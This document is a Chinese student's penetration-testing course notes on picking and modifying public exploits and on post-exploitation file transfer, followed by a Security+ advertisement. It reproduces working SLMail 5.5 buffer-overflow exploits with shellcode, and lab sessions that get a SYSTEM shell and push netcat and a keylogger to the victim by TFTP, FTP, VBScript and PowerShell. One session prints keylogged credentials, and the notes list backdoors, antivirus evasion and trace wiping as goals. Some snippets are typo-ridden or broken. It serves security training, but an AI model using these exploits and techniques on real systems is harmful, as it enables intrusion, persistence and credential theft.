选择和修改EXP
网公开的EXP代码
选择可信赖的EXP源
Exploit-db
SecruityFocus
Searchsploit
有能力修改EXP(Python、Perl、Ruby、C、C++...)
www.securityfocus.com
选择和修改EXP
646.c
类unix坏境下编译
返回地址与我们的环境不符
反弹shell硬编码了回链IP地址
缓冲区偏移量与我们的环境不符
目标IP硬编码
[email protected]:~# searchsploit slmail
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
SLMail 5.5 - POP3 PASS Buffer Overflow Explo | ./windows/remote/638.py
SLMail 5.5 - POP3 PASS Remote Buffer Overflo | ./windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit | ./windows/remote/646.c
SLMail Pro 6.3.1.0 - Multiple Remote Denial | ./windows/dos/31563.txt
--------------------------------------------- ----------------------------------
[email protected]:~# cp /usr/share/exploitdb/platforms/windows/remote/638.py .
[email protected]:~# cp /usr/share/exploitdb/platforms/windows/remote/643.c .
[email protected]:~# cp /usr/share/exploitdb/platforms/windows/remote/646.c .
[email protected]:~# ls
638.py 643.c 646.c 公共 模板 视频 图片 文档 下载 音乐 桌面
╭────────────────────────────────────────────╮
[638.py]
########################################################## ## SLmail 5.5 POP3 PASS Buffer Overflow ## Discovered by : Muts ## Coded by : Muts ## www.offsec.com ## Plain vanilla stack overflow in the PASS command ## ########################################################### D:\Projects\BO>SLmail-5.5-POP3-PASS.py ########################################################### D:\Projects\BO>nc -v 192.168.1.167 4444 ## localhost.lan [192.168.1.167] 4444 (?) open # # Microsoft Windows 2000 [Version 5.00.2195] ## (C) Copyright 1985-2000 Microsoft Corp. ## C:\Program Files\SLmail\System> ##########################################################import structimport socketprint "\n\n###############################################"print "\nSLmail 5.5 POP3 PASS Buffer Overflow"print "\nFound & coded by muts [at] offsec.com"print "\nFor Educational Purposes Only!" print "\n\n###############################################"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"#Tested on Win2k SP4 Unpatched# Change ret address if neededbuffer = ‘\x41‘ * 4654 + struct.pack(‘<L‘, 0x783d6ddf) + ‘\x90‘*32 + sc try:print "\nSending evil buffer..."s.connect((‘192.168.1.167‘,110))data = s.recv(1024)s.send(‘USER username‘ +‘\r\n‘)data = s.recv(1024)s.send(‘PASS ‘ + buffer + ‘\r\n‘)data = s.recv(1024)s.close()print "\nDone! Try connecting to port 4444 on victim machine."except:print "Could not connect to POP3!"# milw0rm.com [2004-11-18]
╰────────────────────────────────────────────╯
╭────────────────────────────────────────────╮
[646.c]
/*SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дуракнедействительный 31337 Team*/#include <string.h>#include <stdio.h>#include <winsock2.h>#include <windows.h>// [*] bind 4444 unsigned char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45""\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49""\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d""\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66""\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61""\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40""\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32""\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6""\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09""\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0""\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff""\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53""\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff""\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64""\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89""\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab""\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51""\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53""\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6""\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";void exploit(int sock) { FILE *test; int *ptr; char userbuf[] = "USER madivan\r\n"; char evil[3001]; char buf[3012]; char receive[1024]; char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90"; memset(buf, 0x00, 3012); memset(evil, 0x00, 3001); memset(evil, 0x43, 3000); ptr = &evil; ptr = ptr + 652; // 2608 memcpy(ptr, &nopsled, 16); ptr = ptr + 4; memcpy(ptr, &shellcode, 317); *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP // banner recv(sock, receive, 200, 0); printf("[+] %s", receive); // user printf("[+] Sending Username...\n"); send(sock, userbuf, strlen(userbuf), 0); recv(sock, receive, 200, 0); printf("[+] %s", receive); // passwd printf("[+] Sending Evil buffer...\n"); sprintf(buf, "PASS %s\r\n", evil); //test = fopen("test.txt", "w"); //fprintf(test, "%s", buf); //fclose(test); send(sock, buf, strlen(buf), 0); printf("[*] Done! Connect to the host on port 4444...\n\n");}int connect_target(char *host, u_short port){ int sock = 0; struct hostent *hp; WSADATA wsa; struct sockaddr_in sa; WSAStartup(MAKEWORD(2,0), &wsa); memset(&sa, 0, sizeof(sa)); hp = gethostbyname(host); if (hp == NULL) { printf("gethostbyname() error!\n"); exit(0); } printf("[+] Connecting to %s\n", host); sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = **((struct in_addr **) hp->h_addr_list); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[-] socket blah?\n"); exit(0); } if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {printf("[-] connect() blah!\n"); exit(0); } printf("[+] Connected to %s\n", host); return sock;}int main(int argc, char **argv){ int sock = 0; int data, port; printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); } port = 110; sock = connect_target(argv[1], port); exploit(sock); closesocket(sock); return 0;}
╰────────────────────────────────────────────╯
[email protected]:~# gedit 638.py
[email protected]:~# gedit 646.c
[email protected]:~# gcc 646.c -0 646
选择和修改EXP
646.c
Windows环境下编译
apt-get install mingw32
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
i586-mingw32msvc-gcc 646.c -lws2_32 -o sl.exe
wine sl.exe 192.168.20.32
[email protected]:~# apt-get install mingw32
[email protected]:~# dpkg --add-architecture i386 && apt-get update && apt-get install wine32
[email protected]:~# i586-mingw32wsvc-gcc 646.c -lws2_32 -o sl.exe
646.c: In function ‘exploit‘:
646.c:46:11: warning: assignment from incompatiable poiter type
ptr = &evil;
^
[email protected]:~# wine sl.exe 192.168.20.32
[email protected]:~# file ls.exe
ls.exe: PE32 executable(console) Intel 80386, for MS Windows
[email protected]:~# gedit 646.c
[email protected]:~# gedit 646.c
[email protected]:~# wine
wine wine64 winecfg winefile wine-wrapper
wine32 wineboot wiedbg winepath winexe
[email protected]:~# wine32 sl.exe 192.168.1.119
[&] SLmail Server POP2 PASSWD Buffer Overflow exploit
[&] by Mad Ivan [ void31337 team ] - http://exploit.void1337.ru
[+] Connectiong to 192.168.1.119
[-] connet() blah!
选择和修改EXP
不同的EXP
不同的系统补丁
软件版本
不同的offset、shellcode
扫描探测目标系统版本,搭建适当的测试环境
避免一锤子测试
修改公开的EXP满足不同坏境需要
了解漏洞原理,修改溢出代码
漏洞利用后阶段
上传工具
提权
擦除攻击痕迹
安装后门
长期控制
Dump密码
内网渗透
后漏洞利用阶段
最大的挑战-----防病毒软件
使用合法的远程控制软件
漏洞利用后阶段
上传文件
持久控制
扩大对目标系统的控制能力
Linux系统
netcat
curl
wget
Windows
缺少预装的下载工具
漏洞利用后阶段
非交互模式shell
类NC远程控制shell
ftp 192.168.1.1
[email protected]:~# nc -vlp 444
Listening on [any] 444 ...
connect to [192.168.1.117] from localhost [192.168.1.119] 1034
Microsoft Windows XP {?? 5.1.2600]
(C) ????? 1989-2001 Microsoft Corp.
C:\Progran Files\SLmail\System>
cd\
C:\>dir
dir
????? C ??????
?????? ??? 94CE=E07B
C:\>cd windows
cd windows
C:\WINDOWS>cd \
cd \
C:\>ftp
ftp
open 127.0.0.1
User (127.0.0.1:(none)): yuanfh
使用TFTP传输文件
XP、2003默认安装
Win7、2008需要单独添加
经常被边界防火墙过滤
Kali
mkdir /tftp
atftpd --daemon --port 69
cp /usr/share/windows-binaries/nc.exe /tftp/
chown -R nobody /tftp
Windwos
tftp -i 192.168.10.5 get nc.exe
[email protected]:~# mkdir /tftp
[email protected]:~# chown -R nobody /tftp/
[email protected]:~# cp /usr/share/windows-binaries/
backdoors/ Hperion-1.0.zip nc.txt wget.exe
enumplus/ klogger.exe plink.exe whoami.exe
exe2.bat.exe mbenm/ radmin.exe
fgdump/ nbtenum/ abd.exe
fport/ nc.exe vncviewer.exe
[email protected]:~# cp /usr/share/windows-binaries/
[email protected]:~# cp /usr/share/windows-binaries/whoami.exe /tftp/
[email protected]:~# cp /usr/share/windows-binaries/klogger.exe /tftp/
[email protected]:~# atftpd --deamon --port 69 /tftp
[email protected]:~# nestat -panu | grep 69
udp 0 0 0.0.0.0:69 0.0.0.0:*
537/inetd
[email protected]:~# killl 537
[email protected]:~# ls /tftp/ -dl
drwxr-xr-x 2 nobody root 4096 9月 6 20:13 /tftp/
[email protected]:~# cd /tftp/
[email protected]:/tftp# ls -l
-rwxr-xr-x 1 root root 23552 9月 6 20:13 klogger.exe
-rwxr-xr-x 1 root root 66560 9月 6 20:13 whoami.exe
[email protected]:/tftp# cd
[email protected]:~# chown -R nobody /tftp/
[email protected]:~# ls -l /tftp/
[email protected]:/tftp# ls -l
-rwxr-xr-x 1 nobody root 23552 9月 6 20:13 klogger.exe
-rwxr-xr-x 1 nobody root 66560 9月 6 20:13 whoami.exe
[email protected]:~# atftpd --deamon --port 69 /tftp
[email protected]:~# nestat -panu | grep 69
udp 0 0 0.0.0.0:69 0.0.0.0:*
2769/atftpd
C:\>tftp
C:\>tftp -i 192.168.117 get atftpd klogger.exe
C:\>tftp -i 192.168.117 get whoami.exe
C:\>tftp -i 192.168.117 get atftpd kiogger.exe
C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>klogger
klogger
C:\>taklist /SVC
taklist /SVC
taklist‘ ??????????
C:\>tasklist
C:\>typw klogger.txt
usrname:yuanfh
password:password01234
使用FTP传输文件
Kali
apt-get install pure-ftpd
ftp.sh
╭────────────────────────────────────────────╮
[ftp.sh]
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
╰────────────────────────────────────────────╯
[email protected]:~# chmod +x ftp.sh
[email protected]:~# ./ftp.sh
groupadd:"ftpgroup"组已存在
useradd:用户"ftpuser"已存在
Password:
Enter it again:
Error.
Check that [yuanfh] doesn‘t already exist.
and that [/etc/pure-ftpd/pureftpd.passwd.tmp] can be written.
In: 无法创建符号链接"60pdb":文件已存在
[ ok ] Restarting pure-ftpd(via systemctl): pure-ftpd.service
┃使用TFTP传输文件
┃Windows
┃ echo open 192.168.1.117 21 > ftp.txt
┃ echo yuanfu>> ftp.txt
┃ echo password>> ftp.txt
┃ echo bin >> ftp.txt
┃ echo GET whoami >> ftp.txt
┃ echo GET klogger >> ftp.txt
┃ echo bye >> ftp.txt
┃ ftp -s: ftp.txt
C:\>echo open 192.168.1.117 21 > ftp.txt
echo open 192.168.1.117 21 > ftp.txt
C:\>echo yuanfu >> ftp.txt
echo yuanfu >> ftp.txt
C:\>echo password>> ftp.txt
echo password>> ftp.txt
C:\>echo bin>> ftp.txt
echo bin > ftp.txt
C:\>echo GET whoami >> ftp.txt
echo GET whoami >> ftp.txt
C:\>echo GET klogger >> ftp.txt
echo GET klogger >> ftp.txt
C:\>echo bye >> ftp.txt
echo bye >> ftp.txt
C:\>type ftp.txt
type ftp.txt
open 192.168.1.117 21
yuanfh
password
bin
GET whoami.exe
GET klogger.exe
bye
C:\>ftp -s: ftp.txt
ftp -s: ftp.txt
User(192.68.1.117:(none)): open 192.168.1.117 21
bin
GET whoami.exe
Can‘t open whoami.exe: No such file or directory
GET klogger.exe
Can‘t open klogger.exe: No such file or directory
bye
[email protected]:~# ls /ftphome/
[email protected]:~# cp /tftp/* /ftphome/
[email protected]:~# ls
638.py 646.c ls.exe 模块 图片 下载 桌面
643.c b.sh 公共 视频 文档 音乐
[email protected]:~# ls /ftphome/
klogger.exe whoami.exe
[email protected]:~# ls /ftphome/ -l
总用量 92
-rwxr-xr-x 1 nobody root 23552 9月 6 20:13 klogger.exe
-rwxr-xr-x 1 nobody root 66560 9月 6 20:13 whoami.exe
C:\>ftp -s: ftp.txt
ftp -s: ftp.txt
User(192.68.1.117:(none)): open 192.168.1.117 21
bin
GET whoami.exe
GET klogger.exe
bye
┃使用VBSCRIPT传输文件
┃wget.vbs
┃cscript wget.bvs http://192.168.1.117/whoamixexe w.exe
[email protected]:~# service apache2 start
[email protected]:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN
3616/apache2
[email protected]:~# cd /var/www/html/
[email protected]:/var/www/html# ls
index.html
[email protected]:/var/www/html# cp /ftphome/whoami.exe
[email protected]:/var/www/html# ls
index.html whoami.exe
╭────────────────────────────────────────────╮
[wget.vbs]
echo strUrl = WScrpit.Arguments.Item(0) > wget.vbs
echo StrFile = WScrpit.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strFata, strBuffer, lugCounter, fs, ts >>wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WirnHttp,WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> Wget.vbs
echo set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scrpiting.FileSystemObject") >>wget.vbs
echo Set fs = fs.CreateTextFile(StrFile, True) >>wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For IngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >>wget.vbs
╰────────────────────────────────────────────╯
C:\>...... //复制上面的命令
C:\>dir
echo strUrl = WScrpit.Arguments.Item(0) > wget.vbs
echo StrFile = WScrpit.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strFata, strBuffer, lugCounter, fs, ts >>wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WirnHttp,WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set htttp = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> Wget.vbs
echo set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scrpiting.FileSystemObject") >>wget.vbs
echo Set fs = fs.CreateTextFile(StrFile, True) >>wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For IngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >>wget.vbs
C:\>cscript wget.bvs http://192.168.1.117/whoamixexe w.exe
cscript wget.bvs http://192.168.1.117/whoamixexe w.exe
Microsoft (R) Windows Scrpit Host Version 5.7
??????C) Microsoft Corporation 1996-2001 ?????????
使用VBSCRIPT传输文件
wget.vbs
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -File wget.ps1
───────────────────────
$storagaDir = $ped
$webclient = New-Object System Net.WebClient
$url = "http://192.168.1.117/whoami.exe"
$file = "new-exploit.exe"
$webclient DownloadFile($url,&file)\
───────────────────────
D:\>dir | find exploit
D:\>whoami
vv\yuanfh
┃使用DEBUG传输文件
┃Debug
┃ 汇编、反汇编
┃ 16进制dump工具
┃ 64k字节
┃upx压缩文件
┃wine exe2bat.exe nc.exe nc hex
┃debug<nc.hex
┃copy 1.dll nc.exe
[email protected]:~# cp /usr/share/windowsp-binaries/nc.exe
[email protected]:~# ls
638.py 643.pc 646.c b.sh nc.exe ls.exe 公共 模板 视频 图片 文档 下载 音乐 桌面
[email protected]:~# ls -l nc.exe
-rwxr-xr-x 1 root root 59392 9月 6 21:00 nc.exe
[email protected]:~# ls -lh nc.exe
-rwxr-xr-x 1 root root 58k 9月 6 21:00 nc.exe
[email protected]:~# upx -9 nc.exe
Ultimate Packer for eXecutables
Copyright (C) 1992 - 2013
UPX 3.19 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
File size Ratio Format Name
--------------------- ------ ----------- ----------
59392 -> 29184 49.14% win32/pe nc.exe
Packed 1 file.
[email protected]:~# wine /usr/share/windows-binaries/exe2bat.exe nc.txt
Finished: nc.exe > nc.txt
[email protected]:~# cd 9/windows/
[email protected]:~# ./09.py
Sending evil buffer...
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
近期,安全牛课堂在做此类线上培训,感兴趣可以了解